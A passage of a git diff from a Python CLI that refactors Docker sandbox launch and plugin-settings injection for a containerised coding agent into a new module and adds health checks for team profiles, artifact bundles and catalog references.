persistence. - - Uses SYNCHRONOUS detached→symlink→exec pattern to eliminate race condition: - 1. Start container in DETACHED mode (no Claude running yet) - 2. Create symlinks BEFORE Claude starts (race eliminated!) - 3. Inject plugin settings to container HOME (if provided) - 4. Exec Claude interactively using docker exec - - This replaces the previous fork-and-inject pattern which had a fundamental - race condition: parent became Docker at T+0, child created symlinks at T+2s, - but Claude read config at T+0 before symlinks existed. - - Args: - workspace: Path to mount as workspace (-w flag for docker sandbox run). - For worktrees, this is the common parent directory. - continue_session: Pass -c flag to Claude - resume: Pass --resume flag to Claude - ensure_credentials: If True, create credential symlinks - org_config: Organization config dict. If provided, security.safety_net - policy is extracted and mounted read-only into container for the - scc-safety-net plugin. If None, a default fail-safe policy is used. - container_workdir: Working directory for Claude inside container - (-w flag for docker exec). If None, defaults to workspace. - For worktrees, this should be the actual workspace path so Claude - finds .claude/settings.local.json. - plugin_settings: Plugin settings dict to inject into container HOME. - Contains extraKnownMarketplaces and enabledPlugins. Injected to - /home/agent/.claude/settings.json to prevent host leakage. - env_vars: Environment variables to set for the sandbox runtime. - - Returns: - Exit code from Docker process - - Raises: - SandboxLaunchError: If Docker command fails to start - """ - try: - # STEP 0: Reset global settings to prevent plugin mixing across teams - # This ensures only workspace settings.local.json drives plugins. - # Called once per scc start flow, before container exec. - if not reset_global_settings(): - err_line( - "Warning: Failed to reset global settings. " - "Plugin mixing may occur if switching teams." - ) - - # ALWAYS write policy file and get host path (even without org config) - # This ensures the mount is present from first launch, avoiding - # sandbox reuse issues when safety-net is enabled later. - # If no org config, uses default {"action": "block"} (fail-safe). - effective_policy = get_effective_safety_net_policy(org_config) - policy_host_path = write_safety_net_policy_to_host(effective_policy) - # Note: policy_host_path may be None if write failed - build_command - # will handle this gracefully (no mount, plugin uses internal defaults) - - if os.name != "nt" and ensure_credentials: - # STEP 1: Sync credentials from existing containers to volume - # This copies credentials from project A's container when starting project B - _sync_credentials_from_existing_containers() - - # STEP 2: Pre-initialize volume files (prevents EOF race condition) - _preinit_credential_volume() - - # STEP 3: Start container in DETACHED mode (no Claude running yet) - # Use retry-with-backoff for Docker Desktop VirtioFS race conditions - # (newly created files may not be immediately visible to Docker) - detached_cmd = build_command( - workspace=workspace, - detached=True, - policy_host_path=policy_host_path, - env_vars=env_vars, - ) - - max_retries = 5 - base_delay = 0.5 # Start with 500ms, exponential backoff - last_result: subprocess.CompletedProcess[str] | None = None - - for attempt in range(max_retries): - result = subprocess.run( - detached_cmd, - capture_output=True, - text=True, - timeout=60, - ) - last_result = result - - if result.returncode == 0: - break # Success! - - # Check if this is a retryable mount race error - if _is_mount_race_error(result.stderr) and attempt < max_retries - 1: - delay = base_delay * (2**attempt) # 0.5s, 1s, 2s, 4s - err_line( - f"Docker mount race detected, retrying in {delay:.1f}s " - f"({attempt + 1}/{max_retries})..." - ) - time.sleep(delay) - else: - # Non-retryable error or last attempt failed - break - - # After retry loop, check final result - if last_result is None or last_result.returncode != 0: - stderr = last_result.stderr if last_result else "" - raise SandboxLaunchError( - user_message="Failed to create Docker sandbox", - command=" ".join(detached_cmd), - stderr=stderr, - ) - - container_id = last_result.stdout.strip() - if not container_id: - raise SandboxLaunchError( - user_message="Docker sandbox returned empty container ID", - command=" ".join(detached_cmd), - ) - - # STEP 4: Create symlinks BEFORE Claude starts - # This is the KEY fix - symlinks exist BEFORE Claude reads config - _create_symlinks_in_container(container_id) - - # STEP 5: Start background migration loop for first-time login - # This runs in background to capture OAuth tokens during login - _start_migration_loop(container_id) - - # STEP 5.5: Inject plugin settings to container HOME (if provided) - # This writes extraKnownMarketplaces and enabledPlugins to - # /home/agent/.claude/settings.json - preventing host leakage - # while ensuring container Claude can access SCC-managed plugins - if plugin_settings: - if not inject_plugin_settings_to_container(container_id, plugin_settings): - err_line( - "Warning: Failed to inject plugin settings. " - "SCC-managed plugins may not be available." - ) - elif not seed_container_plugin_marketplaces(container_id, plugin_settings): - err_line( - "Warning: Failed to pre-seed plugin marketplaces after settings injection. " - "Claude may show transient plugin lookup errors." - ) - - # STEP 6: Exec Claude interactively (replaces current process) - # Claude binary is at /home/agent/.local/bin/claude - # Use -w to set working directory so Claude finds .claude/settings.local.json - # For worktrees: workspace is mount path (parent), container_workdir is actual workspace - exec_workdir = container_workdir if container_workdir else workspace - exec_cmd = ["docker", "exec", "-it", "-w", str(exec_workdir), container_id, "claude"] - - # Skip permission prompts by default - safe since we're in a sandbox container - # The Docker sandbox already provides isolation, so the extra prompts are redundant - exec_cmd.append("--dangerously-skip-permissions") - - # Add Claude-specific flags - if continue_session: - exec_cmd.append("-c") - elif resume: - exec_cmd.append("--resume") - - # Replace current process with docker exec - os.execvp("docker", exec_cmd) - - # If execvp returns, something went wrong - raise SandboxLaunchError( - user_message="Failed to exec into Docker sandbox", - command=" ".join(exec_cmd), - ) - - else: - # Non-credential mode or Windows: use legacy flow - # Policy injection still applies - mount is always present - # NOTE: Legacy path uses workspace for BOTH mount and CWD via -w flag. - # Worktrees require the exec path (credential mode) for separate mount/CWD. - cmd = build_command( - workspace=workspace, - continue_session=continue_session, - resume=resume, - detached=False, - policy_host_path=policy_host_path, - env_vars=env_vars, - ) - - if os.name != "nt": - os.execvp(cmd[0], cmd) - raise SandboxLaunchError( - user_message="Failed to start Docker sandbox", - command=" ".join(cmd), - ) - else: - result = subprocess.run(cmd, text=True) - return result.returncode - - except subprocess.TimeoutExpired: - raise SandboxLaunchError( - user_message="Docker sandbox creation timed out", - suggested_action="Check if Docker Desktop is running", - ) - except FileNotFoundError: - raise SandboxLaunchError( - user_message="Command not found: docker", - suggested_action="Ensure Docker is installed and in your PATH", - ) - except OSError as e: - raise SandboxLaunchError( - user_message=f"Failed to start Docker sandbox: {e}", - ) - - def inject_file_to_sandbox_volume(filename: str, content: str) -> bool: """ Inject a file into the Docker sandbox persistent volume. @@ -551,7 +325,7 @@ def inject_file_to_sandbox_volume(filename: str, content: str) -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -580,7 +354,7 @@ def get_sandbox_settings() -> dict[str, Any] | None: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "cat", "/data/settings.json", @@ -650,7 +424,7 @@ def reset_plugin_caches() -> bool: "run", "--rm", "-v", - f"{SANDBOX_DATA_VOLUME}:/data", + f"{_SANDBOX_DATA_VOLUME}:/data", "alpine", "sh", "-c", @@ -670,78 +444,6 @@ def reset_plugin_caches() -> bool: return False -def _build_known_marketplaces_cache(settings: dict[str, Any]) -> dict[str, Any]: - """Build known_marketplaces.json payload from injected settings.""" - marketplaces = settings.get("extraKnownMarketplaces") - if not isinstance(marketplaces, dict): - return {} - - now_iso = datetime.now(timezone.utc).isoformat(timespec="milliseconds").replace("+00:00", "Z") - cache: dict[str, Any] = {} - - for name, entry in marketplaces.items(): - if not isinstance(entry, dict): - continue - source = entry.get("source") - if not isinstance(source, dict): - continue - - cache_entry: dict[str, Any] = { - "source": source, - "lastUpdated": now_iso, - } - - if source.get("source") == "directory": - path = source.get("path") - if isinstance(path, str) and path: - cache_entry["installLocation"] = path - - cache[str(name)] = cache_entry - - return cache - - -def seed_container_plugin_marketplaces(container_id: str, settings: dict[str, Any]) -> bool: - """ - Pre-seed Claude Code's known marketplaces inside a running container. - - Claude's startup sequence may scan enabled plugins before processing - extraKnownMarketplaces from settings. Writing known_marketplaces.json - ahead of time prevents transient "Plugin not found in marketplace" errors. - - Returns: - True if seed successful or not needed, False otherwise - """ - payload = _build_known_marketplaces_cache(settings) - if not payload: - return True - - try: - payload_json = json.dumps(payload, indent=2) - escaped_payload = payload_json.replace("'", "'\"'\"'") - - result = subprocess.run( - [ - "docker", - "exec", - container_id, - "sh", - "-c", - ( - "mkdir -p /home/agent/.claude/plugins && " - f"printf '%s' '{escaped_payload}' " - "> /home/agent/.claude/plugins/known_marketplaces.json" - ), - ], - capture_output=True, - text=True, - timeout=30, - ) - return result.returncode == 0 - except (subprocess.TimeoutExpired, FileNotFoundError, OSError): - return False - - def reset_global_settings() -> bool: """ Reset global settings and plugin caches in Docker sandbox volume. @@ -770,73 +472,6 @@ def reset_global_settings() -> bool: return success -def inject_plugin_settings_to_container( - container_id: str, - settings: dict[str, Any], -) -> bool: - """ - Inject plugin settings into container HOME directory. - - This writes settings to /home/agent/.claude/settings.json inside the container. - Used for container-only plugin configuration to prevent host Claude from - seeing SCC-managed plugins. - - The settings contain extraKnownMarketplaces and enabledPlugins with absolute - paths pointing to the bind-mounted workspace. - - Args: - container_id: Docker container ID to inject settings into - settings: Settings dict containing extraKnownMarketplaces and enabledPlugins - - Returns: - True if injection successful, False otherwise - """ - try: - # Serialize settings to JSON - settings_json = json.dumps(settings, indent=2) - - # Use docker exec to write settings to container HOME - # First ensure the .claude directory exists - mkdir_result = subprocess.run( - [ - "docker", - "exec", - container_id, - "mkdir", - "-p", - "/home/agent/.claude", - ], - capture_output=True, - timeout=10, - ) - - if mkdir_result.returncode != 0: - return False - - # Write settings via sh -c and echo/printf - # Using printf to handle special characters properly - # Escape single quotes in JSON for shell - escaped_json = settings_json.replace("'", "'\"'\"'") - - write_result = subprocess.run( - [ - "docker", - "exec", - container_id, - "sh", - "-c", - f"printf '%s' '{escaped_json}' > /home/agent/.claude/settings.json", - ], - capture_output=True, - timeout=10, - ) - - return write_result.returncode == 0 - - except (subprocess.TimeoutExpired, FileNotFoundError, OSError): - return False - - def get_or_create_container( workspace: Path | None, branch: str | None = None, diff --git a/src/scc_cli/docker/sandbox.py b/src/scc_cli/docker/sandbox.py new file mode 100644 index 0000000..a7dae44 --- /dev/null +++ b/src/scc_cli/docker/sandbox.py @@ -0,0 +1,437 @@ +""" +Docker sandbox runtime: container launch, plugin injection, and marketplace seeding. + +Extracted from launch.py to keep modules under 800 lines. +Contains run_sandbox() and the helpers it calls during container startup. + +**Legacy Docker Desktop sandbox path.** This module implements the ``docker +sandbox run`` container launch flow (Docker Desktop >= 4.50). It is NOT used by +the OCI-based launch path (see ``adapters/oci_sandbox_runtime.py``). Retained +for users whose Docker Desktop includes the sandbox feature. +""" + +import json +import logging +import os +import subprocess +import time +from datetime import datetime, timezone +from pathlib import Path +from typing import Any + +from ..core.errors import SandboxLaunchError +from .core import build_command +from .credentials import ( + _create_symlinks_in_container, + _preinit_credential_volume, + _start_migration_loop, + _sync_credentials_from_existing_containers, +) + +logger = logging.getLogger(__name__) + + +# ───────────────────────────────────────────────────────────────────────────── +# Mount Race Detection +# ───────────────────────────────────────────────────────────────────────────── + + +def _is_mount_race_error(stderr: str) -> bool: + """Check if Docker error is a mount race condition (retryable). + + Docker Desktop's VirtioFS can have delays before newly created files + are visible. This function detects these specific errors. + + Args: + stderr: The stderr output from the Docker command. + + Returns: + True if the error indicates a mount race condition. + """ + error_lower = stderr.lower() + return ( + "bind source path does not exist" in error_lower + or "no such file or directory" in error_lower + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Plugin Marketplace Cache +# ───────────────────────────────────────────────────────────────────────────── + + +def _build_known_marketplaces_cache(settings: dict[str, Any]) -> dict[str, Any]: + """Build known_marketplaces.json payload from injected settings.""" + marketplaces = settings.get("extraKnownMarketplaces") + if not isinstance(marketplaces, dict): + return {} + + now_iso = datetime.now(timezone.utc).isoformat(timespec="milliseconds").replace("+00:00", "Z") + cache: dict[str, Any] = {} + + for name, entry in marketplaces.items(): + if not isinstance(entry, dict): + continue + source = entry.get("source") + if not isinstance(source, dict): + continue + + cache_entry: dict[str, Any] = { + "source": source, + "lastUpdated": now_iso, + } + + if source.get("source") == "directory": + path = source.get("path") + if isinstance(path, str) and path: + cache_entry["installLocation"] = path + + cache[str(name)] = cache_entry + + return cache + + +def seed_container_plugin_marketplaces(container_id: str, settings: dict[str, Any]) -> bool: + """ + Pre-seed Claude Code's known marketplaces inside a running container. + + Claude's startup sequence may scan enabled plugins before processing + extraKnownMarketplaces from settings. Writing known_marketplaces.json + ahead of time prevents transient "Plugin not found in marketplace" errors. + + Returns: + True if seed successful or not needed, False otherwise + """ + payload = _build_known_marketplaces_cache(settings) + if not payload: + return True + + try: + payload_json = json.dumps(payload, indent=2) + escaped_payload = payload_json.replace("'", "'\"'\"'") + + result = subprocess.run( + [ + "docker", + "exec", + container_id, + "sh", + "-c", + ( + "mkdir -p /home/agent/.claude/plugins && " + f"printf '%s' '{escaped_payload}' " + "> /home/agent/.claude/plugins/known_marketplaces.json" + ), + ], + capture_output=True, + text=True, + timeout=30, + ) + return result.returncode == 0 + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return False + + +# ───────────────────────────────────────────────────────────────────────────── +# Plugin Settings Injection +# ───────────────────────────────────────────────────────────────────────────── + + +def inject_plugin_settings_to_container( + container_id: str, + settings: dict[str, Any], +) -> bool: + """ + Inject plugin settings into container HOME directory. + + This writes settings to /home/agent/.claude/settings.json inside the container. + Used for container-only plugin configuration to prevent host Claude from + seeing SCC-managed plugins. + + The settings contain extraKnownMarketplaces and enabledPlugins with absolute + paths pointing to the bind-mounted workspace. + + Args: + container_id: Docker container ID to inject settings into + settings: Settings dict containing extraKnownMarketplaces and enabledPlugins + + Returns: + True if injection successful, False otherwise + """ + try: + # Serialize settings to JSON + settings_json = json.dumps(settings, indent=2) + + # Use docker exec to write settings to container HOME + # First ensure the .claude directory exists + mkdir_result = subprocess.run( + [ + "docker", + "exec", + container_id, + "mkdir", + "-p", + "/home/agent/.claude", + ], + capture_output=True, + timeout=10, + ) + + if mkdir_result.returncode != 0: + return False + + # Write settings via sh -c and echo/printf + # Using printf to handle special characters properly + # Escape single quotes in JSON for shell + escaped_json = settings_json.replace("'", "'\"'\"'") + + write_result = subprocess.run( + [ + "docker", + "exec", + container_id, + "sh", + "-c", + f"printf '%s' '{escaped_json}' > /home/agent/.claude/settings.json", + ], + capture_output=True, + timeout=10, + ) + + return write_result.returncode == 0 + + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return False + + +# ───────────────────────────────────────────────────────────────────────────── +# Sandbox Launch +# ───────────────────────────────────────────────────────────────────────────── + + +def run_sandbox( + workspace: Path | None = None, + continue_session: bool = False, + resume: bool = False, + ensure_credentials: bool = True, + org_config: dict[str, Any] | None = None, + container_workdir: Path | None = None, + plugin_settings: dict[str, Any] | None = None, + env_vars: dict[str, str] | None = None, +) -> int: + """ + Run Claude in a Docker sandbox with credential persistence. + + Uses SYNCHRONOUS detached→symlink→exec pattern to eliminate race condition: + 1. Start container in DETACHED mode (no Claude running yet) + 2. Create symlinks BEFORE Claude starts (race eliminated!) + 3. Inject plugin settings to container HOME (if provided) + 4. Exec Claude interactively using docker exec + + This replaces the previous fork-and-inject pattern which had a fundamental + race condition: parent became Docker at T+0, child created symlinks at T+2s, + but Claude read config at T+0 before symlinks existed. + + Args: + workspace: Path to mount as workspace (-w flag for docker sandbox run). + For worktrees, this is the common parent directory. + continue_session: Pass -c flag to Claude + resume: Pass --resume flag to Claude + ensure_credentials: If True, create credential symlinks + org_config: Organization config dict. If provided, security.safety_net + policy is extracted and mounted read-only into container for the + scc-safety-net plugin. If None, a default fail-safe policy is used. + container_workdir: Working directory for Claude inside container + (-w flag for docker exec). If None, defaults to workspace. + For worktrees, this should be the actual workspace path so Claude + finds .claude/settings.local.json. + plugin_settings: Plugin settings dict to inject into container HOME. + Contains extraKnownMarketplaces and enabledPlugins. Injected to + /home/agent/.claude/settings.json to prevent host leakage. + env_vars: Environment variables to set for the sandbox runtime. + + Returns: + Exit code from Docker process + + Raises: + SandboxLaunchError: If Docker command fails to start + """ + # Import sibling functions via module to keep test-patch compatibility. + # Tests patch scc_cli.docker.sandbox.; direct imports would bind + # at import-time and be immune to patches. + from .launch import ( + get_effective_safety_net_policy, + reset_global_settings, + write_safety_net_policy_to_host, + ) + + try: + # STEP 0: Reset global settings to prevent plugin mixing across teams + # This ensures only workspace settings.local.json drives plugins. + # Called once per scc start flow, before container exec. + if not reset_global_settings(): + logger.warning( + "Failed to reset global settings. Plugin mixing may occur if switching teams." + ) + + # ALWAYS write policy file and get host path (even without org config) + # This ensures the mount is present from first launch, avoiding + # sandbox reuse issues when safety-net is enabled later. + # If no org config, uses default {"action": "block"} (fail-safe). + effective_policy = get_effective_safety_net_policy(org_config) + policy_host_path = write_safety_net_policy_to_host(effective_policy) + # Note: policy_host_path may be None if write failed - build_command + # will handle this gracefully (no mount, plugin uses internal defaults) + + if os.name != "nt" and ensure_credentials: + # STEP 1: Sync credentials from existing containers to volume + # This copies credentials from project A's container when starting project B + _sync_credentials_from_existing_containers() + + # STEP 2: Pre-initialize volume files (prevents EOF race condition) + _preinit_credential_volume() + + # STEP 3: Start container in DETACHED mode (no Claude running yet) + # Use retry-with-backoff for Docker Desktop VirtioFS race conditions + # (newly created files may not be immediately visible to Docker) + detached_cmd = build_command( + workspace=workspace, + detached=True, + policy_host_path=policy_host_path, + env_vars=env_vars, + ) + + max_retries = 5 + base_delay = 0.5 # Start with 500ms, exponential backoff + last_result: subprocess.CompletedProcess[str] | None = None + + for attempt in range(max_retries): + result = subprocess.run( + detached_cmd, + capture_output=True, + text=True, + timeout=60, + ) + last_result = result + + if result.returncode == 0: + break # Success! + + # Check if this is a retryable mount race error + if _is_mount_race_error(result.stderr) and attempt < max_retries - 1: + delay = base_delay * (2**attempt) # 0.5s, 1s, 2s, 4s + logger.warning( + "Docker mount race detected, retrying in %.1fs (%d/%d)...", + delay, + attempt + 1, + max_retries, + ) + time.sleep(delay) + else: + # Non-retryable error or last attempt failed + break + + # After retry loop, check final result + if last_result is None or last_result.returncode != 0: + stderr = last_result.stderr if last_result else "" + raise SandboxLaunchError( + user_message="Failed to create Docker sandbox", + command=" ".join(detached_cmd), + stderr=stderr, + ) + + container_id = last_result.stdout.strip() + if not container_id: + raise SandboxLaunchError( + user_message="Docker sandbox returned empty container ID", + command=" ".join(detached_cmd), + ) + + # STEP 4: Create symlinks BEFORE Claude starts + # This is the KEY fix - symlinks exist BEFORE Claude reads config + _create_symlinks_in_container(container_id) + + # STEP 5: Start background migration loop for first-time login + # This runs in background to capture OAuth tokens during login + _start_migration_loop(container_id) + + # STEP 5.5: Inject plugin settings to container HOME (if provided) + # This writes extraKnownMarketplaces and enabledPlugins to + # /home/agent/.claude/settings.json - preventing host leakage + # while ensuring container Claude can access SCC-managed plugins + if plugin_settings: + if not inject_plugin_settings_to_container(container_id, plugin_settings): + logger.warning( + "Failed to inject plugin settings. " + "SCC-managed plugins may not be available." + ) + elif not seed_container_plugin_marketplaces(container_id, plugin_settings): + logger.warning( + "Failed to pre-seed plugin marketplaces after settings injection. " + "Claude may show transient plugin lookup errors." + ) + + # STEP 6: Exec Claude interactively (replaces current process) + # Claude binary is at /home/agent/.local/bin/claude + # Use -w to set working directory so Claude finds .claude/settings.local.json + # For worktrees: workspace is mount path (parent), container_workdir is actual workspace + exec_workdir = container_workdir if container_workdir else workspace + exec_cmd = ["docker", "exec", "-it", "-w", str(exec_workdir), container_id, "claude"] + + # Skip permission prompts by default - safe since we're in a sandbox container + # The Docker sandbox already provides isolation, so the extra prompts are redundant + exec_cmd.append("--dangerously-skip-permissions") + + # Add Claude-specific flags + if continue_session: + exec_cmd.append("-c") + elif resume: + exec_cmd.append("--resume") + + # Replace current process with docker exec + os.execvp("docker", exec_cmd) + + # If execvp returns, something went wrong + raise SandboxLaunchError( + user_message="Failed to exec into Docker sandbox", + command=" ".join(exec_cmd), + ) + + else: + # Non-credential mode or Windows: use legacy flow + # Policy injection still applies - mount is always present + # NOTE: Legacy path uses workspace for BOTH mount and CWD via -w flag. + # Worktrees require the exec path (credential mode) for separate mount/CWD. + cmd = build_command( + workspace=workspace, + continue_session=continue_session, + resume=resume, + detached=False, + policy_host_path=policy_host_path, + env_vars=env_vars, + ) + + if os.name != "nt": + os.execvp(cmd[0], cmd) + raise SandboxLaunchError( + user_message="Failed to start Docker sandbox", + command=" ".join(cmd), + ) + else: + result = subprocess.run(cmd, text=True) + return result.returncode + + except subprocess.TimeoutExpired: + raise SandboxLaunchError( + user_message="Docker sandbox creation timed out", + suggested_action="Check if Docker Desktop is running", + ) + except FileNotFoundError: + raise SandboxLaunchError( + user_message="Command not found: docker", + suggested_action="Ensure Docker is installed and in your PATH", + ) + except OSError as e: + raise SandboxLaunchError( + user_message=f"Failed to start Docker sandbox: {e}", + ) diff --git a/src/scc_cli/doctor/__init__.py b/src/scc_cli/doctor/__init__.py index 18c1439..65d8952 100644 --- a/src/scc_cli/doctor/__init__.py +++ b/src/scc_cli/doctor/__init__.py @@ -1,7 +1,7 @@ """Provide system diagnostics and health checks for SCC-CLI. Offer comprehensive health checks for all prerequisites needed to run -Claude Code in Docker sandboxes. +AI coding agents in Docker sandboxes. Philosophy: "Fast feedback, clear guidance" - Check all prerequisites quickly @@ -30,7 +30,9 @@ check_git_version_for_worktrees, check_marketplace_auth_available, check_org_config_reachable, + check_provider_auth, check_proxy_environment, + check_runtime_backend, check_user_config_valid, check_workspace_path, check_worktree_branch_conflicts, @@ -74,6 +76,7 @@ "check_docker_desktop", "check_docker_sandbox", "check_docker_running", + "check_runtime_backend", "check_wsl2", "check_workspace_path", "check_worktree_health", @@ -87,6 +90,7 @@ "check_cache_readable", "check_cache_ttl_status", "check_exception_stores", + "check_provider_auth", "check_proxy_environment", "run_all_checks", # Orchestration and rendering diff --git a/src/scc_cli/doctor/checks/__init__.py b/src/scc_cli/doctor/checks/__init__.py index c0b9aa4..e02854f 100644 --- a/src/scc_cli/doctor/checks/__init__.py +++ b/src/scc_cli/doctor/checks/__init__.py @@ -15,6 +15,14 @@ from ..types import CheckResult +# Governed-artifact checks +from .artifacts import ( + build_artifact_diagnostics_summary, + check_bundle_resolution, + check_catalog_health, + check_team_context, +) + # Cache & State checks from .cache import ( check_cache_readable, @@ -36,6 +44,9 @@ check_docker_running, check_docker_sandbox, check_git, + check_provider_auth, + check_provider_image, + check_runtime_backend, check_workspace_path, check_wsl2, ) @@ -56,6 +67,9 @@ load_cached_org_config, ) +# Safety policy check +from .safety import check_safety_policy + # Worktree checks from .worktree import ( check_git_version_for_worktrees, @@ -84,6 +98,13 @@ def run_all_checks() -> list[CheckResult]: wsl2_result, _ = check_wsl2() results.append(wsl2_result) + results.append(check_runtime_backend()) + + try: + results.append(check_provider_image()) + except Exception: + pass # partial-results pattern — don't block other checks + results.append(check_config_directory()) # Git worktree checks (may return None if not in a git repo) @@ -125,6 +146,22 @@ def run_all_checks() -> list[CheckResult]: # Exception stores check results.append(check_exception_stores()) + # Safety policy check + results.append(check_safety_policy()) + + # Governed-artifact checks + team_ctx = check_team_context() + if team_ctx is not None: + results.append(team_ctx) + + catalog_check = check_catalog_health() + if catalog_check is not None: + results.append(catalog_check) + + bundle_res = check_bundle_resolution() + if bundle_res is not None: + results.append(bundle_res) + return results @@ -141,6 +178,9 @@ def run_all_checks() -> list[CheckResult]: "check_docker_sandbox", "check_docker_running", "check_wsl2", + "check_provider_auth", + "check_provider_image", + "check_runtime_backend", "check_workspace_path", # Worktree checks "check_worktree_health", @@ -159,6 +199,13 @@ def run_all_checks() -> list[CheckResult]: "check_cache_ttl_status", "check_exception_stores", "check_proxy_environment", + # Safety policy check + "check_safety_policy", + # Governed-artifact checks + "check_team_context", + "check_bundle_resolution", + "check_catalog_health", + "build_artifact_diagnostics_summary", # Orchestration "run_all_checks", ] diff --git a/src/scc_cli/doctor/checks/artifacts.py b/src/scc_cli/doctor/checks/artifacts.py new file mode 100644 index 0000000..8013d68 --- /dev/null +++ b/src/scc_cli/doctor/checks/artifacts.py @@ -0,0 +1,347 @@ +"""Governed-artifact diagnostics for the doctor module. + +Reports: +1. Active team context and enabled bundles +2. Selected provider and effective render plan +3. Rendered vs skipped vs blocked artifacts with reasons +4. Bundle resolution health (all referenced bundles exist, all artifacts resolvable) +""" + +from __future__ import annotations + +import logging + +from scc_cli import config as _config_module +from scc_cli.core.bundle_resolver import ( + BundleResolutionResult, + resolve_render_plan, +) +from scc_cli.core.enums import SeverityLevel +from scc_cli.ports.config_models import NormalizedOrgConfig + +from ..types import CheckResult + +logger = logging.getLogger(__name__) + + +def _load_raw_org_config() -> dict[str, object] | None: + """Load raw cached org config for normalization.""" + return _config_module.load_cached_org_config() + + +def _get_selected_profile() -> str | None: + """Return the selected team profile name.""" + return _config_module.get_selected_profile() + + +def _normalize_org_config(raw: dict[str, object]) -> NormalizedOrgConfig: + """Normalize raw org config dict into typed model. + + Uses the NormalizedOrgConfig.from_dict() factory to avoid a static + doctor→adapters import that would violate the architectural import + boundary (only bootstrap.py may import adapters). + """ + # NormalizedOrgConfig.from_dict uses importlib internally to avoid + # the ports→adapters boundary violation + return NormalizedOrgConfig.from_dict(dict(raw)) + + +def check_team_context() -> CheckResult | None: + """Check active team context and enabled bundles. + + Reports which team profile is active and what bundles are enabled. + + Returns: + CheckResult with team/bundle info, None if no org config. + """ + try: + raw_org = _load_raw_org_config() + if raw_org is None: + return CheckResult( + name="Team Context", + passed=True, + message="No org config — standalone mode, no bundles active", + severity=SeverityLevel.INFO, + ) + + profile_name = _get_selected_profile() + if profile_name is None: + return CheckResult( + name="Team Context", + passed=True, + message="No team profile selected", + severity=SeverityLevel.WARNING, + ) + + org = _normalize_org_config(raw_org) + team = org.get_profile(profile_name) + if team is None: + available = org.list_profile_names() + return CheckResult( + name="Team Context", + passed=False, + message=( + f"Selected profile '{profile_name}' not found in org config; " + f"available: {available}" + ), + fix_hint="Run 'scc team select' to pick a valid profile", + severity=SeverityLevel.ERROR, + ) + + bundles = team.enabled_bundles + if not bundles: + return CheckResult( + name="Team Context", + passed=True, + message=f"Profile '{profile_name}' active — no bundles enabled", + severity=SeverityLevel.INFO, + ) + + bundle_list = ", ".join(bundles) + return CheckResult( + name="Team Context", + passed=True, + message=f"Profile '{profile_name}' — bundles: [{bundle_list}]", + ) + + except Exception as exc: + return CheckResult( + name="Team Context", + passed=False, + message=f"Unexpected error checking team context: {exc}", + severity=SeverityLevel.ERROR, + ) + + +def check_bundle_resolution(provider: str = "claude") -> CheckResult | None: + """Check bundle resolution health for the active team and provider. + + Resolves all enabled bundles against the governed-artifacts catalog + and reports effective, skipped, and failed artifacts. + + Args: + provider: Target provider to resolve bundles for. + + Returns: + CheckResult with resolution summary, None if no org config/profile. + """ + try: + raw_org = _load_raw_org_config() + if raw_org is None: + return None + + profile_name = _get_selected_profile() + if profile_name is None: + return None + + org = _normalize_org_config(raw_org) + team = org.get_profile(profile_name) + if team is None or not team.enabled_bundles: + return None + + result = resolve_render_plan(org, profile_name, provider) + + return _format_resolution_result(result, provider) + + except Exception as exc: + return CheckResult( + name="Bundle Resolution", + passed=False, + message=f"Bundle resolution failed: {exc}", + severity=SeverityLevel.ERROR, + ) + + +def _format_resolution_result( + result: BundleResolutionResult, + provider: str, +) -> CheckResult: + """Format a BundleResolutionResult into a doctor CheckResult.""" + total_effective = sum(len(p.effective_artifacts) for p in result.plans) + total_skipped = sum(len(p.skipped) for p in result.plans) + diag_count = len(result.diagnostics) + + parts: list[str] = [f"provider={provider}"] + parts.append(f"effective={total_effective}") + if total_skipped > 0: + parts.append(f"skipped={total_skipped}") + if diag_count > 0: + parts.append(f"diagnostics={diag_count}") + + has_errors = any("not found" in d.reason for d in result.diagnostics) + + if has_errors: + detail_lines: list[str] = [] + for d in result.diagnostics: + if "not found" in d.reason: + detail_lines.append(f" {d.artifact_name}: {d.reason}") + detail = "; ".join(detail_lines).strip() + return CheckResult( + name="Bundle Resolution", + passed=False, + message=f"Resolution errors ({', '.join(parts)}): {detail}", + fix_hint="Check governed_artifacts catalog in org config", + severity=SeverityLevel.ERROR, + ) + + return CheckResult( + name="Bundle Resolution", + passed=True, + message=f"Resolved OK ({', '.join(parts)})", + ) + + +def check_catalog_health() -> CheckResult | None: + """Check that the governed-artifacts catalog is structurally sound. + + Verifies: catalog exists, bundles reference valid artifacts, + and bindings reference valid artifacts. + + Returns: + CheckResult, or None if no org config. + """ + try: + raw_org = _load_raw_org_config() + if raw_org is None: + return None + + org = _normalize_org_config(raw_org) + catalog = org.governed_artifacts + + if not catalog.bundles and not catalog.artifacts and not catalog.bindings: + return CheckResult( + name="Artifact Catalog", + passed=True, + message="No governed artifacts defined", + severity=SeverityLevel.INFO, + ) + + problems: list[str] = [] + + # Check that bundles reference existing artifacts + for bundle_id, bundle in catalog.bundles.items(): + for art_name in bundle.artifacts: + if art_name not in catalog.artifacts: + problems.append( + f"bundle '{bundle_id}' references missing artifact '{art_name}'" + ) + + # Check that bindings reference existing artifacts + for art_name in catalog.bindings: + if art_name not in catalog.artifacts: + problems.append(f"binding exists for unknown artifact '{art_name}'") + + if problems: + summary = "; ".join(problems[:3]) + suffix = f" (+{len(problems) - 3} more)" if len(problems) > 3 else "" + return CheckResult( + name="Artifact Catalog", + passed=False, + message=f"Catalog issues: {summary}{suffix}", + fix_hint="Review governed_artifacts section in org config", + severity=SeverityLevel.ERROR, + ) + + artifact_count = len(catalog.artifacts) + bundle_count = len(catalog.bundles) + return CheckResult( + name="Artifact Catalog", + passed=True, + message=f"{artifact_count} artifact(s), {bundle_count} bundle(s) — all references valid", + ) + + except Exception as exc: + return CheckResult( + name="Artifact Catalog", + passed=False, + message=f"Catalog health check failed: {exc}", + severity=SeverityLevel.ERROR, + ) + + +def build_artifact_diagnostics_summary( + provider: str = "claude", +) -> dict[str, object]: + """Build a diagnostics summary dict suitable for support bundles. + + Returns a dict with: + - team_context: active profile and bundles + - resolution: per-bundle effective/skipped/diagnostics + - catalog: artifact/bundle counts and reference health + + This is the support-bundle integration point. + """ + summary: dict[str, object] = {} + + # Team context + 